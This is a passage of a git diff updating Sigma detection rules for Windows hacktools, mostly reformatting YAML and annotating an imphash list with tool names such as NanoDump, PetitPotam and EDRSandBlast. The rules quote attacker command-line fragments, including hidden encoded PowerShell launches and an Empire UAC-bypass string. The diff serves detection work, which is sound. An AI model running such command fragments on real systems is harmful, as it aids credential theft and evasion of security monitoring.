CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. references: - https://github.com/byt3bl33d3r/CrackMapExec - https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242 @@ -22,20 +21,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: + CommandLine|contains: - join*split + # Line 343ff - ( $ShellId[1]+$ShellId[13]+'x') - ( $PSHome[*]+$PSHOME[*]+ - ( $env:Public[13]+$env:Public[5]+'x') - ( $env:ComSpec[4,*,25]-Join'') - - '[1,3]+''x''-Join'''')' + - "[1,3]+'x'-Join'')" condition: process_creation and (all of selection_*) fields: - SubjectUserName diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_createminidump.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_createminidump.yml index 4abcef809..406d1cc93 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_createminidump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_createminidump.yml @@ -1,8 +1,7 @@ title: HackTool - CreateMiniDump Execution id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d status: test -description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process - memory for credential extraction on the attacker's machine +description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine references: - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass author: Florian Roth (Nextron Systems) @@ -19,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \CreateMiniDump.exe - - Imphash: 4a07f944a83e8a7c2525efa35dd30e2f - - Hashes|contains: IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f + - NewProcessName|endswith: \CreateMiniDump.exe + - Imphash: 4a07f944a83e8a7c2525efa35dd30e2f + - Hashes|contains: IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_dinjector.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_dinjector.yml index e0d910014..70157e709 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_dinjector.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_dinjector.yml @@ -1,10 +1,9 @@ title: HackTool - DInjector PowerShell Cradle Execution id: d78b5d61-187d-44b6-bf02-93486a80de5a status: test -description: Detects the use of the Dinject PowerShell cradle based on the specific - flags +description: Detects the use of the Dinject PowerShell cradle based on the specific flags references: - - https://github.com/snovvcrash/DInjector + - https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork author: Florian Roth (Nextron Systems) date: 2021/12/07 modified: 2023/02/04 @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /am51' - ' /password' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_edrsilencer.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_edrsilencer.yml index 182c46afa..738764318 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_edrsilencer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_edrsilencer.yml @@ -1,11 +1,8 @@ title: HackTool - EDRSilencer Execution id: eb2d07d4-49cb-4523-801a-da002df36602 status: experimental -description: 'Detects the execution of EDRSilencer, a tool that leverages Windows - Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents - from reporting security events to the server based on PE metadata information. - - ' +description: | + Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. references: - https://github.com/netero1010/EDRSilencer author: '@gott_cyber' @@ -21,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \EDRSilencer.exe - - OriginalFileName: EDRSilencer.exe - - Description|contains: EDRSilencer + - NewProcessName|endswith: \EDRSilencer.exe + - OriginalFileName: EDRSilencer.exe + - Description|contains: EDRSilencer condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml index 666fa756f..1f46f4124 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -NoP -sta -NonI -W Hidden -Enc ' - ' -noP -sta -w 1 -enc ' - ' -NoP -NonI -W Hidden -enc ' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml index b76326e4d..ae996cd74 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update)' - ' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_evil_winrm.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_evil_winrm.yml index 2a47f49b3..c43257a83 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_evil_winrm.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_evil_winrm.yml @@ -1,9 +1,7 @@ title: HackTool - WinRM Access Via Evil-WinRM id: a197e378-d31b-41c0-9635-cfdf1c1bb423 status: test -description: Adversaries may use Valid Accounts to log into a computer using the Remote - Desktop Protocol (RDP). The adversary may then perform actions as the logged-on - user. +description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm - https://github.com/Hackplayers/evil-winrm @@ -21,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection_mstsc: - CommandLine|contains|all: + CommandLine|contains|all: - '-i ' - '-u ' - '-p ' - NewProcessName|endswith: \ruby.exe + NewProcessName|endswith: \ruby.exe condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml index 126d82faa..150f6f6be 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml @@ -1,8 +1,7 @@ title: Hacktool Execution - Imphash id: 24e3e58a-646b-4b50-adef-02ef935b9fc8 status: test -description: Detects the execution of different Windows based hacktools via their - import hash (imphash) even if the files have been renamed +description: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed references: - Internal Research author: Florian Roth (Nextron Systems) @@ -20,182 +19,182 @@ detection: EventID: 4688 Channel: Security selection: - - Imphash: - - bcca3c247b619dcd13c8cdff5f123932 - - 3a19059bd7688cb88e70005f18efc439 - - bf6223a49e45d99094406777eb6004ba - - 23867a89c2b8fc733be6cf5ef902f2d1 - - a37ff327f8d48e8a4d2f757e1b6e70bc - - f9a28c458284584a93b14216308d31bd - - 6118619783fc175bc7ebecff0769b46e - - 959a83047e80ab68b368fdb3f4c6e4ea - - 563233bfa169acc7892451f71ad5850a - - 87575cb7a0e0700eb37f2e3668671a08 - - 13f08707f759af6003837a150a371ba1 - - 1781f06048a7e58b323f0b9259be798b - - 233f85f2d4bc9d6521a6caae11a1e7f5 - - 24af2584cbf4d60bbe5c6d1b31b3be6d - - 632969ddf6dbf4e0f53424b75e4b91f2 - - 713c29b396b907ed71a72482759ed757 - - 749a7bb1f0b4c4455949c0b2bf7f9e9f - - 8628b2608957a6b0c6330ac3de28ce2e - - 8b114550386e31895dfab371e741123d - - 94cb940a1a6b65bed4d5a8f849ce9793 - - 9d68781980370e00e0bd939ee5e6c141 - - b18a1401ff8f444056d29450fbc0a6ce - - cb567f9498452721d77a451374955f5f - - 730073214094cd328547bf1f72289752 - - 17b461a082950fc6332228572138b80c - - dc25ee78e2ef4d36faa0badf1e7461c9 - - 819b19d53ca6736448f9325a85736792 - - 829da329ce140d873b4a8bde2cbfaa7e - - c547f2e66061a8dffb6f5a3ff63c0a74 - - 0588081ab0e63ba785938467e1b10cca - - 0d9ec08bac6c07d9987dfd0f1506587c - - bc129092b71c89b4d4c8cdf8ea590b29 - - 4da924cf622d039d58bce71cdf05d242 - - e7a3a5c377e2d29324093377d7db1c66 - - 9a9dbec5c62f0380b4fa5fd31deffedf - - af8a3976ad71e5d5fdfb67ddb8dadfce - - 0c477898bbf137bbd6f2a54e3b805ff4 - - 0ca9f02b537bcea20d4ea5eb1a9fe338 - - 3ab3655e5a14d4eefc547f4781bf7f9e - - e6f9d5152da699934b30daab206471f6 - - 3ad59991ccf1d67339b319b15a41b35d - - ffdd59e0318b85a3e480874d9796d872 - - 0cf479628d7cc1ea25ec7998a92f5051 - - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 - - d6d0f80386e1380d05cb78e871bc72b1 - - 38d9e015591bbfd4929e0d0f47fa0055 - - 0e2216679ca6e1094d63322e3412d650 - - ada161bf41b8e5e9132858cb54cab5fb - - 2a1bc4913cd5ecb0434df07cb675b798 - - 11083e75553baae21dc89ce8f9a195e4 - - a23d29c9e566f2fa8ffbb79267f5df80 - - 4a07f944a83e8a7c2525efa35dd30e2f - - 767637c23bb42cd5d7397cf58b0be688 - - 14c4e4c72ba075e9069ee67f39188ad8 - - 3c782813d4afce07bbfc5a9772acdbdc - - 7d010c6bb6a3726f327f7e239166d127 - - 89159ba4dd04e4ce5559f132a9964eb3 - - 6f33f4a5fc42b8cec7314947bd13f30f - - 5834ed4291bdeb928270428ebbaf7604 - - 5a8a8a43f25485e7ee1b201edcbc7a38 - - dc7d30b90b2d8abf664fbed2b1b59894 - - 41923ea1f824fe63ea5beb84db7a3e74 - - 3de09703c8e79ed2ca3f01074719906b - - a53a02b997935fd8eedcb5f7abab9b9f - - e96a73c7bf33a464c510ede582318bf2 - - 32089b8851bbf8bc2d014e9f37288c83 - - 09D278F9DE118EF09163C6140255C690 - - 03866661686829d806989e2fc5a72606 - - e57401fbdadcd4571ff385ab82bd5d6d - - 84B763C45C0E4A3E7CA5548C710DB4EE - - 19584675d94829987952432e018d5056 - - 330768a4f172e10acb6287b87289d83b - - 885c99ccfbe77d1cbfcb9c4e7c1a3313 - - 22a22bc9e4e0d2f189f1ea01748816ac - - 7fa30e6bb7e8e8a69155636e50bf1b28 - - 96df3a3731912449521f6f8d183279b1 - - 7e6cf3ff4576581271ac8a313b2aab46 - - 51791678f351c03a0eb4e2a7b05c6e17 - - 25ce42b079282632708fc846129e98a5 - - 021bcca20ba3381b11bdde26b4e62f20 - - 59223b5f52d8799d38e0754855cbdf42 - - 81e75d8f1d276c156653d3d8813e4a43 - - 17244e8b6b8227e57fe709ccad421420 - - 5b76da3acdedc8a5cdf23a798b5936b4 - - cb2b65bb77d995cc1c0e5df1c860133c - - 40445337761d80cf465136fafb1f63e6 - - 8a790f401b29fa87bc1e56f7272b3aa6 - - Hashes|contains: - - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 - - IMPHASH=3A19059BD7688CB88E70005F18EFC439 - - IMPHASH=bf6223a49e45d99094406777eb6004ba - - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 - - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC - - IMPHASH=F9A28C458284584A93B14216308D31BD - - IMPHASH=6118619783FC175BC7EBECFF0769B46E - - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA - - IMPHASH=563233BFA169ACC7892451F71AD5850A - - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 - - IMPHASH=13F08707F759AF6003837A150A371BA1 - - IMPHASH=1781F06048A7E58B323F0B9259BE798B - - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 - - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D - - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 - - IMPHASH=713C29B396B907ED71A72482759ED757 - - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F - - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E - - IMPHASH=8B114550386E31895DFAB371E741123D - - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 - - IMPHASH=9D68781980370E00E0BD939EE5E6C141 - - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE - - IMPHASH=CB567F9498452721D77A451374955F5F - - IMPHASH=730073214094CD328547BF1F72289752 - - IMPHASH=17B461A082950FC6332228572138B80C - - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 - - IMPHASH=819B19D53CA6736448F9325A85736792 - - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E - - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 - - IMPHASH=0588081AB0E63BA785938467E1B10CCA - - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C - - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 - - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 - - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 - - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF - - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE - - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 - - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 - - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E - - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 - - IMPHASH=3AD59991CCF1D67339B319B15A41B35D - - IMPHASH=FFDD59E0318B85A3E480874D9796D872 - - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 - - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 - - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 - - IMPHASH=0E2216679CA6E1094D63322E3412D650 - - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB - - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 - - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 - - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 - - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F - - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 - - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 - - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC - - IMPHASH=7D010C6BB6A3726F327F7E239166D127 - - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 - - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F - - IMPHASH=5834ED4291BDEB928270428EBBAF7604 - - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 - - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 - - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 - - IMPHASH=3DE09703C8E79ED2CA3F01074719906B - - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F - - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 - - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 - - IMPHASH=09D278F9DE118EF09163C6140255C690 - - IMPHASH=03866661686829d806989e2fc5a72606 - - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d - - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE - - IMPHASH=19584675D94829987952432E018D5056 - - IMPHASH=330768A4F172E10ACB6287B87289D83B - - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 - - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC - - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 - - IMPHASH=96DF3A3731912449521F6F8D183279B1 - - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 - - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 - - IMPHASH=25CE42B079282632708FC846129E98A5 - - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 - - IMPHASH=59223B5F52D8799D38E0754855CBDF42 - - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 - - IMPHASH=17244E8B6B8227E57FE709CCAD421420 - - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 - - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C - - IMPHASH=40445337761D80CF465136FAFB1F63E6 - - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 + - Imphash: + - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam + - 3a19059bd7688cb88e70005f18efc439 # PetitPotam + - bf6223a49e45d99094406777eb6004ba # PetitPotam + - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato + - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato + - f9a28c458284584a93b14216308d31bd # JuicyPotatoNG + - 6118619783fc175bc7ebecff0769b46e # RoguePotato + - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato + - 563233bfa169acc7892451f71ad5850a # RoguePotato + - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato + - 13f08707f759af6003837a150a371ba1 # Pwdump + - 1781f06048a7e58b323f0b9259be798b # Pwdump + - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump + - 24af2584cbf4d60bbe5c6d1b31b3be6d # Pwdump + - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump + - 713c29b396b907ed71a72482759ed757 # Pwdump + - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump + - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump + - 8b114550386e31895dfab371e741123d # Pwdump + - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX + - 9d68781980370e00e0bd939ee5e6c141 # Pwdump + - b18a1401ff8f444056d29450fbc0a6ce # Pwdump + - cb567f9498452721d77a451374955f5f # Pwdump + - 730073214094cd328547bf1f72289752 # Htran + - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons + - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons + - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons + - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons + - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump + - 0588081ab0e63ba785938467e1b10cca # PPLDump + - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump + - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump + - 4da924cf622d039d58bce71cdf05d242 # NanoDump + - e7a3a5c377e2d29324093377d7db1c66 # NanoDump + - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump + - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump + - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump + - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump + - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump + - e6f9d5152da699934b30daab206471f6 # NanoDump + - 3ad59991ccf1d67339b319b15a41b35d # NanoDump + - ffdd59e0318b85a3e480874d9796d872 # NanoDump + - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump + - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump + - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump + - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz + - 0e2216679ca6e1094d63322e3412d650 # HandleKatz + - ada161bf41b8e5e9132858cb54cab5fb # DripLoader + - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader + - 11083e75553baae21dc89ce8f9a195e4 # DripLoader + - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader + - 4a07f944a83e8a7c2525efa35dd30e2f # CreateMiniDump + - 767637c23bb42cd5d7397cf58b0be688 # UACMe Akagi + - 14c4e4c72ba075e9069ee67f39188ad8 # UACMe Akagi + - 3c782813d4afce07bbfc5a9772acdbdc # UACMe Akagi + - 7d010c6bb6a3726f327f7e239166d127 # UACMe Akagi + - 89159ba4dd04e4ce5559f132a9964eb3 # UACMe Akagi + - 6f33f4a5fc42b8cec7314947bd13f30f # UACMe Akagi + - 5834ed4291bdeb928270428ebbaf7604 # UACMe Akagi + - 5a8a8a43f25485e7ee1b201edcbc7a38 # UACMe Akagi + - dc7d30b90b2d8abf664fbed2b1b59894 # UACMe Akagi + - 41923ea1f824fe63ea5beb84db7a3e74 # UACMe Akagi + - 3de09703c8e79ed2ca3f01074719906b # UACMe Akagi + - a53a02b997935fd8eedcb5f7abab9b9f # WCE + - e96a73c7bf33a464c510ede582318bf2 # WCE + - 32089b8851bbf8bc2d014e9f37288c83 # Sliver Stagers + - 09D278F9DE118EF09163C6140255C690 # Dumpert + - 03866661686829d806989e2fc5a72606 # Dumpert + - e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - 19584675d94829987952432e018d5056 # SysmonQuiet + - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook + - 885c99ccfbe77d1cbfcb9c4e7c1a3313 # Forkatz + - 22a22bc9e4e0d2f189f1ea01748816ac # PPLKiller + - 7fa30e6bb7e8e8a69155636e50bf1b28 # PPLKiller + - 96df3a3731912449521f6f8d183279b1 # Backstab + - 7e6cf3ff4576581271ac8a313b2aab46 # Backstab + - 51791678f351c03a0eb4e2a7b05c6e17 # Backstab + - 25ce42b079282632708fc846129e98a5 # Forensia + - 021bcca20ba3381b11bdde26b4e62f20 # EDRSandBlast + - 59223b5f52d8799d38e0754855cbdf42 # EDRSandBlast + - 81e75d8f1d276c156653d3d8813e4a43 # EDRSandBlast + - 17244e8b6b8227e57fe709ccad421420 # EDRSandBlast + - 5b76da3acdedc8a5cdf23a798b5936b4 # EDRSandBlast + - cb2b65bb77d995cc1c0e5df1c860133c # EDRSandBlast + - 40445337761d80cf465136fafb1f63e6 # EDRSandBlast + - 8a790f401b29fa87bc1e56f7272b3aa6 # EDRSilencer + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam + - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam + - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam + - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato + - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato + - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG + - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato + - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato + - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato + - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato + - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump + - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump + - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump + - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump + - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump + - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump + - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump + - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump + - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump + - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX + - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump + - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump + - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump + - IMPHASH=730073214094CD328547BF1F72289752 # Htran + - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons + - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons + - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons + - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons + - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump + - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump + - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump + - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump + - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump + - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump + - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump + - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump + - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump + - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump + - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump + - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump + - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump + - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump + - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump + - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump + - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump + - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz + - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz + - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader + - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader + - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader + - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader + - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump + - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi + - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi + - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi + - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi + - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi + - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi + - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi + - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi + - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi + - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi + - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi + - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE + - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE + - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers + - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert + - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert + - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet + - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook + - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz + - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller + - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller + - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab + - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab + - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab + - IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia + - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast + - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast + - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast + - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast + - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast + - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast + - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast + - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer condition: process_creation and selection falsepositives: - Legitimate use of one of these tools diff --git 